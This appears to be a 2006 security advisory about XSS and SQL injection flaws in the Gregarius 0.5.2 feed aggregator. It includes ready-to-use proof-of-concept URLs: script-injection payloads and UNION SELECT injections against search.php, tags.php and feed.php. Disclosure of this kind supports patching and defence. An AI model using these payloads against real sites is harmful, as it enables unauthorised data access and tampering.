Gregarius 0.5.2 XSS and SQL Injection Vulnerabilities

2006.03.05
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

http://gregarius.net/ Gregarius is a web-based RSS/RDF/ATOM feed aggregator, designed to run on your web server, allowing you to access your news sources from wherever you want. XSS in search.php: search.php?rss_query=<script>alert(1)</script>&rss_query_match=exact XSS in tags.php: tags.php?tag=<script>alert(1)</script> SQL Injection in feed.php: feed.php?folder=3 and 1=1 UNION select title from item-- with magic_quotes=off: SQL Injection in search.php: search.php?rss_query=aa%')) UNION select null,null,null,null,null,null,null,null,null,null,null,title,null from item-- &rss_query_match=exact On Gregarius 0.5.2/PostrgreSQL this could lead to damaging/altering the DB and possible local file disclosure due to not properly sanitized $lang include, on early 0.5.3 svn version to admin hash disclosure. More XSS and SQL Injections in admin section. Fixed in latest 0.5.3 svn.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top